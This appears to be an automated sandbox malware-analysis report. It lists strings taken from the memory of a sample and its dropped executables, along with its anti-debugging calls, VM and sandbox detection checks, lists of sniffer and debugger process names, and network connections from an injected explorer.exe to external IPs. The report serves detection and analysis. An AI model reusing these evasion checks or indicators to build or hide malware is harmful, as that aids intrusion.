Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
Source: explorer.exe, 00000001.00000000.1665346300.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1668573400.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthoritiesbad addressbad argSizebad m valuebad messagebad timedivbitcoins.skbroken pipecampaign_idcgocall nilclobberfreeclosesocketcombase.dllcreated by crypt32.dlle2.keff.orgembedded/%sexternal IPfile existsfinal tokenfloat32nan2float64nan1float64nan2float64nan3gccheckmarkgeneralizedget CDN: %wgetpeernamegetsocknameglobalAllochttp2clienthttp2serverhttps_proxyi/o timeoutlocal errormSpanManualmethodargs(minTrigger=move %s: %wmswsock.dllnetpollInitnext servernil contextopera-proxyorannis.comout of syncparse errorprocess: %sreflect.SetreflectOffsretry-afterruntime: P runtime: g runtime: p scheddetailsechost.dllsecur32.dllservice: %sshell32.dllshort writestack tracestart proxytaskmgr.exetls: alert(tracealloc(traffic updunreachableuserenv.dllversion.dllversion=195wininet.dllwup_process (sensitive) B (
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: ermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: yreleasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdo
Source: explorer.exe, 00000001.00000000.1665346300.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: sse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ... MB, \" and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s"'&+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.2500
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: GetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaICE-CONTROLLINGIdempotency-KeyImpersonateSelfInstall failureIsWindowUnicodeIsWindowVisibleIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: SafeArrayCopyDataSafeArrayCreateExSentence_TerminalSysAllocStringLenSystemFunction036Too Many RequestsTransfer-EncodingUnexpected escapeUnified_IdeographUnknown AttributeVGAuthService.exeWSAEnumProtocolsWWTSQueryUserTokenWrite after CloseWrong CredentialsX-Idempotency-Key\System32\drivers\\.\VBoxMiniRdrDN
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: RTP.exeSYSTEMROOT=SetFileTimeSignWritingSoft_DottedSystemDriveTTL expiredUninstallerVBoxServiceVMUSrvc.exeVariantInitVirtualFreeVirtualLockWSARecvFromWarang_CitiWhite_SpaceWinDefender[:^xdigit:]\dsefix.exeadditionalsalarm clockapplicationassistQueueauthorities
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: vmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ... exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2066199382.0000000003780000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2567693218.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: ><'\'') = ) m=+Inf-Inf.bat.cmd.com.css.exe.gif.htm.jpg.mjs.pdf.png.svg.sys.xml0x%x1.1110803125: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomAtoiCDN=CESTChamDATADashDataDateEESTEULAEtagFromGOGCGoneHostJulyJuneLEAFLisuMiaoModiNZDTNZSTNameNewaPINGPOSTPathQEMUROOTSASTSTARSendStatTempThaiTypeUUID"%s"\rss\smb\u00
Source: etopt.exe, 00000019.00000002.2903789358.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .?AVCZwProcessesGetCallback@?1??IsRunningInVmwareByProcessList@@YAHXZ@
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--D
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: eUnprocessable EntityWinmonProcessMonitor\\.\pipe\VBoxTrayIPC^.*\._Ctype_uint8_t$asn1: syntax error: assigned stream ID 0bad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpcertificate requiredchan send (nil chan)close of nil channe
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: rdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying=
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: potency-Key\System32\drivers\\.\VBoxMiniRdrDN os/exec.Command(^.*\._Ctype_char$bad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcpu name is emptycreate window: %wdecode server: %wdecryption faileddownload fi
Source: 4854.exe, 00000004.00000002.1911380987.0000000004261000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: -aV( Loopback )\|(TAP-?)\|(TEST)\|(VPN)\|(Remote )^(Microsoft Hyper-V Network Adapter\|USB \|Targus)
Source: tuc4.tmp, 00000017.00000002.3070276555.000000000077E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}O_3/
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
Source: RegSvcs.exe, 00000008.00000002.3078495334.0000000000E95000.00000004.00000020.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2677807232.000000000101E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2702934288.0000000002A89000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: \\.\HGFS`
Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP5
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: lUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Window
Source: explorer.exe, 00000001.00000000.1668045299.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1668045299.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1668573400.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: PalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2702934288.0000000002A89000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: vmhgfsP
Source: etopt.exe, 00000019.00000002.2903789358.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SnifferPro.exeCharles.exeIris.exeHTTPDebuggerPro.exeSRSniffer.exeOstinato.exeWPE.exeWSockExpert_cn.exeWSockExpert.exeSmartSniff.exehookMe.exeNetworkTrafficView.exetcpmon.exesmsniff.exeHttpAnalyzerStdV7.exeHttpAnalyzerStdV6.exeHttpAnalyzerStdV5.exeHttpAnalyzerStdV4.exeCsnas.exeOllyIce.exeOllyDbg.exeWinDbg.exeSoftIce.exeWireshark.exeFiddler.exe%08X%08XROOT\WMIMSSMBios_RawSMBiosTablesSMBiosDataNull StringVirtualvirtualpackIdmidsidmac1mac2boardmanusnproductcpunamecoreNumsysmajorminorbuildreleasex64notepadvmadminpowerOnlocaleSoftware\ChromiumlocInfostsdquerylocationcountryprovincecityispcountylonlatcltInfoinstcandenyAppKeydenyAppssuccneedRespuninstappactiveSoftware\Baidu\BDLOGcur_versionvmtoolsd.exewmacthlp.exeC:\XWsgczyjbr(%XhuX%huX%hu)
Source: etopt.exe, 00000019.00000002.2903789358.0000000004EE0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .?AVCMacGetCallback@?1??IsRunningInVmwareByMacID@GMoonLib@@YA_NXZ@
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
Source: dialer.exe, 00000022.00000003.2224899162.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: bmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: ultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-languageadvertise erroragent is closedapplication/pdfasyncpreemptoffbad certificatebad trailer keybefore EfiGuardclass registredclient finishedcouldn't set AVcouldn't set sbdecode hash: %wdo
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2724435477.0000000002E90000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (a
Source: RegAsm.exe, 00000018.00000002.2356147989.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWL
Source: dialer.exe, 00000022.00000003.2224899162.00000162B30E0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: swsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAccepted
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservi
Source: explorer.exe, 00000001.00000000.1665346300.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: ddrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.)
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: rayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\Def

Source: C:\Users\user\AppData\Local\Temp\4854.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\InstallSetup8.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\tuc4.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\uVQLD8YVk6.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\uVQLD8YVk6.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\srvwauv	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	System information queried: CodeIntegrityInformation

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\CFAA.exe

Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\uVQLD8YVk6.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\srvwauv	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Process queried: DebugObjectHandle

Source: C:\Users\user\AppData\Local\Temp\4854.exe

Code function: 4_2_6CE8948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_6CE8948B

Source: C:\Users\user\AppData\Local\Temp\4854.exe

Code function: 4_2_6CE3B6C0 GetModuleHandleW,GetModuleHandleW,LoadLibraryW,GetProcAddress,__cftoe,GetModuleHandleW,GetProcAddress,

4_2_6CE3B6C0

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_005C0042 push dword ptr fs:[00000030h]	14_2_005C0042
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_006BCD1B push dword ptr fs:[00000030h]	14_2_006BCD1B
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	Code function: 15_2_02A890A3 push dword ptr fs:[00000030h]	15_2_02A890A3

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe

Code function: 14_2_0041B7D2 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

14_2_0041B7D2

Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE8948B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_6CE8948B
Source: C:\Users\user\AppData\Local\Temp\4854.exe	Code function: 4_2_6CE8B144 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_6CE8B144
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00401154 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00401154
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00413A4F __NMSG_WRITE,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_00413A4F
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_0040AC1C SetUnhandledExceptionFilter,	14_2_0040AC1C
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Code function: 14_2_00402E42 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_00402E42

Source: C:\Users\user\AppData\Local\Temp\4854.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: srvwauv.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 185.215.113.68 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 5.42.65.125 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 54.231.140.225 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.192.141.1 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.160.130.138 80	Jump to behavior

.NET source code references suspicious native API functions

Source: C086.exe.1.dr, Redist.cs	Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
